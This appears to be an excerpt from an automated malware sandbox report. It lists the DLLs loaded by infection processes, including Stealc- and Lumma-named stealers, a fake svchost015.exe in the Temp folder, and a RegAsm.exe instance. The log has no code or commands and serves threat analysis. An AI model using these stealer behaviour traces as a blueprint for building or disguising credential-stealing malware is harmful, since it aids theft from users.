Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: msisip.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: wshext.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: mskeyprotect.dll
